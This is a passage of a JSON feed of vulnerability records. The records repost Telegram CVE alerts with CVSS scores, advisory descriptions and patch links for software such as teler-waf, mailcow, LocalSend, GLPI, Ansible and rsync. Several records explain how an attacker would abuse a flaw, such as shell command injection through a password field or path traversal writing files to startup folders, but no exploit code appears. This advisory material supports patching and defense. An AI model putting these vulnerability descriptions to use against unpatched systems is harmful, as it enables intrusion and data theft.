https://github.com/russellhaering/gosaml2/releases/tag/v0.9.0\n4. https://pkg.go.dev/vuln/GO-2023-1602", "creation_timestamp": "2025-02-25T15:23:26.000000Z"}, {"uuid": "88ce0a22-0330-4a21-adcc-583564edae65", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-P2PF-G8CQ-3GQ5", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/5307", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-26047\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L)\n\ud83d\udd39 Description: teler-waf is a Go HTTP middleware that provides teler IDS functionality to protect against web-based attacks. In teler-waf prior to version v0.2.0 is vulnerable to a bypass attack when a specific case-sensitive hex entities payload with special characters such as CR/LF and horizontal tab is used. This vulnerability allows an attacker to execute arbitrary JavaScript code on the victim's browser and compromise the security of the web application. An attacker can exploit this vulnerability to bypass common web attack threat rules in teler-waf and launch cross-site scripting (XSS) attacks. The attacker can execute arbitrary JavaScript code on the victim's browser and steal sensitive information, such as login credentials and session tokens, or take control of the victim's browser and perform malicious actions. This issue has been patched in version 0.2.0.\n\ud83d\udccf Published: 2023-03-03T22:44:16.538Z\n\ud83d\udccf Modified: 2025-02-25T15:02:13.606Z\n\ud83d\udd17 References:\n1. https://github.com/kitabisa/teler-waf/security/advisories/GHSA-p2pf-g8cq-3gq5\n2. https://github.com/dwisiswant0/cwa-filter-rules/commit/d818d1645832d1a02cd210c7680e692d2bf4313b\n3. https://github.com/kitabisa/teler-waf/releases/tag/v0.2.0", "creation_timestamp": "2025-02-25T15:23:29.000000Z"}, {"uuid": "c6b728b9-4f7d-4496-8aca-10b51e1a4768", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-32GR-4CQ6-5W5Q", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/5306", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-26491\n\ud83d\udd25 CVSS Score: 5.4 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:L)\n\ud83d\udd39 Description: RSSHub is an open source and extensible RSS feed generator. When the URL parameters contain certain special characters, it returns an error page that does not properly handle XSS vulnerabilities, allowing for the execution of arbitrary JavaScript code. Users who access the deliberately constructed URL are affected. This vulnerability was fixed in version c910c4d28717fb860fbe064736641f379fab2c91. Please upgrade to this or a later version, there are no known workarounds.\n\ud83d\udccf Published: 2023-03-03T22:41:37.230Z\n\ud83d\udccf Modified: 2025-02-25T15:02:18.810Z\n\ud83d\udd17 References:\n1. https://github.com/DIYgod/RSSHub/security/advisories/GHSA-32gr-4cq6-5w5q\n2. https://github.com/DIYgod/RSSHub/commit/c910c4d28717fb860fbe064736641f379fab2c91", "creation_timestamp": "2025-02-25T15:23:28.000000Z"}, {"uuid": "ead4d284-c5fb-4905-8235-a60c04d56dde", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4W59-C3GC-RRHP", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/5309", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-23929\n\ud83d\udd25 CVSS Score: 8.8 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: vantage6 is a privacy preserving federated learning infrastructure for secure insight exchange. Currently, the refresh token is valid indefinitely. The refresh token should get a validity of 24-48 hours. A fix was released in version 3.8.0.\n\n\ud83d\udccf Published: 2023-03-03T23:37:50.748Z\n\ud83d\udccf Modified: 2025-02-25T15:02:00.830Z\n\ud83d\udd17 References:\n1. https://github.com/vantage6/vantage6/security/advisories/GHSA-4w59-c3gc-rrhp\n2. https://github.com/vantage6/vantage6/commit/48ebfca42359e9a6743e9598684585e2522cdce8", "creation_timestamp": "2025-02-25T15:23:30.000000Z"}, {"uuid": "4b8b8977-53f4-49b2-9b7c-fd519ed17cff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3J2F-WF52-CJG7", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/5308", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-26490\n\ud83d\udd25 CVSS Score: 7.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\ud83d\udd39 Description: mailcow is a dockerized email package, with multiple containers linked in one bridged network. The Sync Job feature - which can be made available to standard users by assigning them the necessary permission - suffers from a shell command injection. A malicious user can abuse this vulnerability to obtain shell access to the Docker container running dovecot. The imapsync Perl script implements all the necessary functionality for this feature, including the XOAUTH2 authentication mechanism. This code path creates a shell command to call openssl. However, since different parts of the specified user password are included without any validation, one can simply execute additional shell commands. Notably, the default ACL for a newly-created mailcow account does not include the necessary permission. The Issue has been fixed within the 2023-03 Update (March 3rd 2023). As a temporary workaround the Syncjob ACL can be removed from all mailbox users, preventing from creating or changing existing Syncjobs.\n\ud83d\udccf Published: 2023-03-03T23:37:03.105Z\n\ud83d\udccf Modified: 2025-02-25T15:02:06.803Z\n\ud83d\udd17 References:\n1. https://github.com/mailcow/mailcow-dockerized/security/advisories/GHSA-3j2f-wf52-cjg7\n2. https://github.com/mailcow/mailcow-dockerized/releases/tag/2023-03", "creation_timestamp": "2025-02-25T15:23:29.000000Z"}, {"uuid": "6654dd48-e050-4712-b1f2-e73d7cce1b8d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:1095", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5477", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-0650\n\ud83d\udd25 CVSS Score: 8.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A flaw was found in the Open Virtual Network (OVN). Specially crafted UDP packets may bypass egress access control lists (ACLs) in OVN installations configured with a logical switch with DNS records set on it and if the same switch has any egress ACLs configured. This issue can lead to unauthorized access to virtual machines and containers running on the OVN network.\n\ud83d\udccf Published: 2025-01-23T16:34:31.390Z\n\ud83d\udccf Modified: 2025-02-26T06:53:05.605Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:1083\n2. https://access.redhat.com/errata/RHSA-2025:1084\n3. https://access.redhat.com/errata/RHSA-2025:1085\n4. https://access.redhat.com/errata/RHSA-2025:1086\n5. https://access.redhat.com/errata/RHSA-2025:1087\n6. https://access.redhat.com/errata/RHSA-2025:1088\n7. https://access.redhat.com/errata/RHSA-2025:1089\n8. https://access.redhat.com/errata/RHSA-2025:1090\n9. https://access.redhat.com/errata/RHSA-2025:1091\n10. https://access.redhat.com/errata/RHSA-2025:1092\n11. https://access.redhat.com/errata/RHSA-2025:1093\n12. https://access.redhat.com/errata/RHSA-2025:1094\n13. https://access.redhat.com/errata/RHSA-2025:1095\n14. https://access.redhat.com/errata/RHSA-2025:1096\n15. https://access.redhat.com/errata/RHSA-2025:1097\n16. https://access.redhat.com/security/cve/CVE-2025-0650\n17. https://bugzilla.redhat.com/show_bug.cgi?id=2339537\n18. https://www.openwall.com/lists/oss-security/2025/01/22/5", "creation_timestamp": "2025-02-26T07:24:00.000000Z"}, {"uuid": "c24d92fe-1df1-4521-9c52-034b23908a36", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VFXC-QG3V-J2R5", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/5342", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-23046\n\ud83d\udd25 CVSS Score: 6.3 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: GLPI is a free asset and IT management software package. Starting in version 9.5.0 and prior to version 10.0.18, if a \"Mail servers\" authentication provider is configured to use an Oauth connection provided by the OauthIMAP plugin, anyone can connect to GLPI using a user name on which an Oauth authorization has already been established. Version 10.0.18 contains a patch. As a workaround, one may disable any \"Mail servers\" authentication provider configured to use an Oauth connection provided by the OauthIMAP plugin.\n\ud83d\udccf Published: 2025-02-25T17:48:17.801Z\n\ud83d\udccf Modified: 2025-02-25T17:48:17.801Z\n\ud83d\udd17 References:\n1. https://github.com/glpi-project/glpi/security/advisories/GHSA-vfxc-qg3v-j2r5\n2. https://github.com/glpi-project/glpi/releases/tag/10.0.18", "creation_timestamp": "2025-02-25T18:22:35.000000Z"}, {"uuid": "5bb0159b-0e8e-44b7-9a6d-4611fa9d1b7d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:5143", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5446", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-3653\n\ud83d\udd25 CVSS Score: 5.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)\n\ud83d\udd39 Description: A vulnerability was found in Undertow. This issue requires enabling the learning-push handler in the server's config, which is disabled by default, leaving the maxAge config in the handler unconfigured. The default is -1, which makes the handler vulnerable. If someone overwrites that config, the server is not subject to the attack. The attacker needs to be able to reach the server with a normal HTTP request.\n\ud83d\udccf Published: 2024-07-08T21:21:20.899Z\n\ud83d\udccf Modified: 2025-02-26T04:13:19.878Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:4392\n2. https://access.redhat.com/errata/RHSA-2024:5143\n3. https://access.redhat.com/errata/RHSA-2024:5144\n4. https://access.redhat.com/errata/RHSA-2024:5145\n5. https://access.redhat.com/errata/RHSA-2024:5147\n6. https://access.redhat.com/errata/RHSA-2024:6437\n7. https://access.redhat.com/security/cve/CVE-2024-3653\n8. https://bugzilla.redhat.com/show_bug.cgi?id=2274437", "creation_timestamp": "2025-02-26T04:24:30.000000Z"}, {"uuid": "400aef1d-c1a7-45cb-a2ed-6e0df4de91d9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:6437", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5446", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-3653\n\ud83d\udd25 CVSS Score: 5.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)\n\ud83d\udd39 Description: A vulnerability was found in Undertow. This issue requires enabling the learning-push handler in the server's config, which is disabled by default, leaving the maxAge config in the handler unconfigured. The default is -1, which makes the handler vulnerable. If someone overwrites that config, the server is not subject to the attack. The attacker needs to be able to reach the server with a normal HTTP request.\n\ud83d\udccf Published: 2024-07-08T21:21:20.899Z\n\ud83d\udccf Modified: 2025-02-26T04:13:19.878Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:4392\n2. https://access.redhat.com/errata/RHSA-2024:5143\n3. https://access.redhat.com/errata/RHSA-2024:5144\n4. https://access.redhat.com/errata/RHSA-2024:5145\n5. https://access.redhat.com/errata/RHSA-2024:5147\n6. https://access.redhat.com/errata/RHSA-2024:6437\n7. https://access.redhat.com/security/cve/CVE-2024-3653\n8. https://bugzilla.redhat.com/show_bug.cgi?id=2274437", "creation_timestamp": "2025-02-26T04:24:30.000000Z"}, {"uuid": "406d2f7e-c97a-4a58-bd3d-1ea80144bfd1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:5147", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5446", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-3653\n\ud83d\udd25 CVSS Score: 5.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)\n\ud83d\udd39 Description: A vulnerability was found in Undertow. This issue requires enabling the learning-push handler in the server's config, which is disabled by default, leaving the maxAge config in the handler unconfigured. The default is -1, which makes the handler vulnerable. If someone overwrites that config, the server is not subject to the attack. The attacker needs to be able to reach the server with a normal HTTP request.\n\ud83d\udccf Published: 2024-07-08T21:21:20.899Z\n\ud83d\udccf Modified: 2025-02-26T04:13:19.878Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:4392\n2. https://access.redhat.com/errata/RHSA-2024:5143\n3. https://access.redhat.com/errata/RHSA-2024:5144\n4. https://access.redhat.com/errata/RHSA-2024:5145\n5. https://access.redhat.com/errata/RHSA-2024:5147\n6. https://access.redhat.com/errata/RHSA-2024:6437\n7. https://access.redhat.com/security/cve/CVE-2024-3653\n8. https://bugzilla.redhat.com/show_bug.cgi?id=2274437", "creation_timestamp": "2025-02-26T04:24:30.000000Z"}, {"uuid": "6139aa25-56df-494c-bba2-e3e9049b888d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QM8P-JMJ2-QFC2", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/5347", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-21627\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N)\n\ud83d\udd39 Description: GLPI is a free asset and IT management software package. In versions prior to 10.0.18, a malicious link can be crafted to perform a reflected XSS attack on the search page. If the anonymous ticket creation is enabled, this attack can be performed by an unauthenticated user. Version 10.0.18 contains a fix for the issue.\n\ud83d\udccf Published: 2025-02-25T15:43:34.919Z\n\ud83d\udccf Modified: 2025-02-25T19:12:43.921Z\n\ud83d\udd17 References:\n1. https://github.com/glpi-project/glpi/security/advisories/GHSA-qm8p-jmj2-qfc2", "creation_timestamp": "2025-02-25T19:23:34.000000Z"}, {"uuid": "2ba4f4e4-3f8b-4890-8642-2604795a28d4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:1861", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5372", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9902\n\ud83d\udd25 CVSS Score: 6.3 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:L)\n\ud83d\udd39 Description: A flaw was found in Ansible. The ansible-core `user` module can allow an unprivileged user to silently create or replace the contents of any file on any system path and take ownership of it when a privileged user executes the `user` module against the unprivileged user's home directory. If the unprivileged user has traversal permissions on the directory containing the exploited target file, they retain full control over the contents of the file as its owner.\n\ud83d\udccf Published: 2024-11-06T09:56:54.505Z\n\ud83d\udccf Modified: 2025-02-25T20:05:07.738Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10762\n2. https://access.redhat.com/errata/RHSA-2024:8969\n3. https://access.redhat.com/errata/RHSA-2024:9894\n4. https://access.redhat.com/errata/RHSA-2025:1861\n5. https://access.redhat.com/security/cve/CVE-2024-9902\n6. https://bugzilla.redhat.com/show_bug.cgi?id=2318271", "creation_timestamp": "2025-02-25T20:22:58.000000Z"}, {"uuid": "c972dd0e-c929-41e3-8cf2-769c8b1d2016", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R5CR-XM48-97XP", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/14130", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-46554\n\ud83d\udd25 CVSS Score: 5.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)\n\ud83d\udd39 Description: XWiki is a generic wiki platform. In versions starting from 1.8.1 to before 14.10.22, from 15.0-rc-1 to before 15.10.12, from 16.0.0-rc-1 to before 16.4.3, and from 16.5.0-rc-1 to before 16.7.0, anyone can access the metadata of any attachment in the wiki using the wiki attachment REST endpoint. There is no filtering for the results depending on current user rights, meaning an unauthenticated user could exploit this even in a private wiki. This issue has been patched in versions 14.10.22, 15.10.12, 16.4.3, and 16.7.0.\n\ud83d\udccf Published: 2025-04-30T18:27:53.677Z\n\ud83d\udccf Modified: 2025-04-30T18:59:16.789Z\n\ud83d\udd17 References:\n1. https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-r5cr-xm48-97xp\n2. https://github.com/xwiki/xwiki-platform/commit/37ecea84fdd053c33733c2ae9a0778bf98eae608\n3. https://github.com/xwiki/xwiki-platform/commit/a43e933ddeda17dad1772396e1757998260e9342\n4. https://github.com/xwiki/xwiki-platform/commit/c02ce7843a39851865b9d7b6132e32fdd21e3856\n5. https://jira.xwiki.org/browse/XWIKI-22424", "creation_timestamp": "2025-04-30T19:13:41.000000Z"}, {"uuid": "6329694e-e043-4d14-9036-03f8a3be3eea", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:9894", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5372", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9902\n\ud83d\udd25 CVSS Score: 6.3 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:L)\n\ud83d\udd39 Description: A flaw was found in Ansible. The ansible-core `user` module can allow an unprivileged user to silently create or replace the contents of any file on any system path and take ownership of it when a privileged user executes the `user` module against the unprivileged user's home directory. If the unprivileged user has traversal permissions on the directory containing the exploited target file, they retain full control over the contents of the file as its owner.\n\ud83d\udccf Published: 2024-11-06T09:56:54.505Z\n\ud83d\udccf Modified: 2025-02-25T20:05:07.738Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10762\n2. https://access.redhat.com/errata/RHSA-2024:8969\n3. https://access.redhat.com/errata/RHSA-2024:9894\n4. https://access.redhat.com/errata/RHSA-2025:1861\n5. https://access.redhat.com/security/cve/CVE-2024-9902\n6. https://bugzilla.redhat.com/show_bug.cgi?id=2318271", "creation_timestamp": "2025-02-25T20:22:58.000000Z"}, {"uuid": "84afd516-8f87-46ef-9650-05ddf79afa9a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:8969", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5372", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9902\n\ud83d\udd25 CVSS Score: 6.3 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:L)\n\ud83d\udd39 Description: A flaw was found in Ansible. The ansible-core `user` module can allow an unprivileged user to silently create or replace the contents of any file on any system path and take ownership of it when a privileged user executes the `user` module against the unprivileged user's home directory. If the unprivileged user has traversal permissions on the directory containing the exploited target file, they retain full control over the contents of the file as its owner.\n\ud83d\udccf Published: 2024-11-06T09:56:54.505Z\n\ud83d\udccf Modified: 2025-02-25T20:05:07.738Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10762\n2. https://access.redhat.com/errata/RHSA-2024:8969\n3. https://access.redhat.com/errata/RHSA-2024:9894\n4. https://access.redhat.com/errata/RHSA-2025:1861\n5. https://access.redhat.com/security/cve/CVE-2024-9902\n6. https://bugzilla.redhat.com/show_bug.cgi?id=2318271", "creation_timestamp": "2025-02-25T20:22:58.000000Z"}, {"uuid": "ea54bc4c-220d-4f4f-ad3d-d6f97cd481cd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-F7JP-P6J4-3522", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/5375", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-27142\n\ud83d\udd25 CVSS Score: 6.3 (cvssV4_0, Vector: CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U)\n\ud83d\udd39 Description: LocalSend is a free, open-source app that allows users to securely share files and messages with nearby devices over their local network without needing an internet connection. Prior to version 1.17.0, due to the missing sanitization of the path in the `POST /api/localsend/v2/prepare-upload` and the `POST /api/localsend/v2/upload` endpoint, a malicious file transfer request can write files to the arbitrary location on the system, resulting in the remote command execution. A malicious file transfer request sent by nearby devices can write files into an arbitrary directory. This usually allows command execution via the startup folder on Windows or Bash-related files on Linux. If the user enables the `Quick Save` feature, it will silently write files without explicit user interaction. Version 1.17.0 fixes this issue.\n\ud83d\udccf Published: 2025-02-25T20:03:23.204Z\n\ud83d\udccf Modified: 2025-02-25T20:03:23.204Z\n\ud83d\udd17 References:\n1. https://github.com/localsend/localsend/security/advisories/GHSA-f7jp-p6j4-3522\n2. https://github.com/localsend/localsend/commit/e8635204ec782ded45bc7d698deb60f3c4105687", "creation_timestamp": "2025-02-25T20:23:04.000000Z"}, {"uuid": "aa4c8ca5-53e8-4b29-8745-beff69a5a8fe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5MVM-89C9-9GM5", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/5373", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-27146\n\ud83d\udd25 CVSS Score: 2.7 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N)\n\ud83d\udd39 Description: matrix-appservice-irc is a Node.js IRC bridge for Matrix. The matrix-appservice-irc bridge up to version 3.0.3 contains a vulnerability which can lead to arbitrary IRC command execution as the puppeted user. The attacker can only inject commands executed as their own IRC user. The vulnerability has been patched in matrix-appservice-irc version 3.0.4.\n\ud83d\udccf Published: 2025-02-25T20:04:40.400Z\n\ud83d\udccf Modified: 2025-02-25T20:04:40.400Z\n\ud83d\udd17 References:\n1. https://github.com/matrix-org/matrix-appservice-irc/security/advisories/GHSA-5mvm-89c9-9gm5\n2. https://github.com/matrix-org/matrix-appservice-irc/commit/74f02c8e11f16ed1b355700092c1aa9c036a11bd", "creation_timestamp": "2025-02-25T20:22:59.000000Z"}, {"uuid": "9fb75268-8174-4ad2-9c3a-e8c93a0be98a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8XV7-G2Q3-FQGC", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5487", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-47053\n\ud83d\udd25 CVSS Score: 7.7 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N)\n\ud83d\udd39 Description: This advisory addresses an authorization vulnerability in Mautic's HTTP Basic Authentication implementation. This flaw could allow unauthorized access to sensitive report data.\n\n  *  Improper Authorization:\u00a0An authorization flaw exists in Mautic's API Authorization implementation. Any authenticated user, regardless of assigned roles or permissions, can access all reports and their associated data via the API. This bypasses the intended access controls governed by the \"Reporting Permissions &gt; View Own\" and \"Reporting Permissions &gt; View Others\" permissions, which should restrict access to non-System Reports.\n\ud83d\udccf Published: 2025-02-26T11:54:17.219Z\n\ud83d\udccf Modified: 2025-02-26T11:55:28.089Z\n\ud83d\udd17 References:\n1. https://github.com/mautic/mautic/security/advisories/GHSA-8xv7-g2q3-fqgc\n2. https://cwe.mitre.org/data/definitions/287.html\n3. https://docs.mautic.org/en/5.2/configuration/settings.html#api-settings", "creation_timestamp": "2025-02-26T12:31:56.000000Z"}, {"uuid": "8fc21b5a-a69c-4ee5-8261-b71674d8a8bd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-42W7-RMV5-4X2J", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/5376", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-27110\n\ud83d\udd25 CVSS Score: 7.9 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H)\n\ud83d\udd39 Description: Libmodsecurity is one component of the ModSecurity v3 project. The library codebase serves as an interface to ModSecurity Connectors taking in web traffic and applying traditional ModSecurity processing. A bug that exists only in Libmodsecurity3 version 3.0.13 means that, in 3.0.13, Libmodsecurity3 can't decode encoded HTML entities if they contains leading zeroes. Version 3.0.14 contains a fix. No known workarounds are available.\n\ud83d\udccf Published: 2025-02-25T20:00:44.211Z\n\ud83d\udccf Modified: 2025-02-25T20:00:44.211Z\n\ud83d\udd17 References:\n1. https://github.com/owasp-modsecurity/ModSecurity/security/advisories/GHSA-42w7-rmv5-4x2j\n2. https://github.com/owasp-modsecurity/ModSecurity/issues/3340", "creation_timestamp": "2025-02-25T20:23:05.000000Z"}, {"uuid": "7deac085-0e99-412b-b1d4-31e19543b600", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:8077", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5445", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-4029\n\ud83d\udd25 CVSS Score: 4.1 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Wildfly\u2019s management interface. Due to the lack of limitation of sockets for the management interface, it may be possible to cause a denial of service hitting the nofile limit as there is no possibility to configure or set a maximum number of connections.\n\ud83d\udccf Published: 2024-05-02T14:55:27.135Z\n\ud83d\udccf Modified: 2025-02-26T04:13:27.071Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:8075\n2. https://access.redhat.com/errata/RHSA-2024:8076\n3. https://access.redhat.com/errata/RHSA-2024:8077\n4. https://access.redhat.com/errata/RHSA-2024:8080\n5. https://access.redhat.com/errata/RHSA-2024:8823\n6. https://access.redhat.com/errata/RHSA-2024:8824\n7. https://access.redhat.com/errata/RHSA-2024:8826\n8. https://access.redhat.com/security/cve/CVE-2024-4029\n9. https://bugzilla.redhat.com/show_bug.cgi?id=2278615", "creation_timestamp": "2025-02-26T04:24:29.000000Z"}, {"uuid": "4f401cb9-1b6a-4da1-9aee-24b25b6129c2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:1123", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5493", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-12085\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)\n\ud83d\udd39 Description: A flaw was found in rsync which could be triggered when rsync compares file checksums. This flaw allows an attacker to manipulate the checksum length (s2length) to cause a comparison between a checksum and uninitialized memory and leak one byte of uninitialized stack data at a time.\n\ud83d\udccf Published: 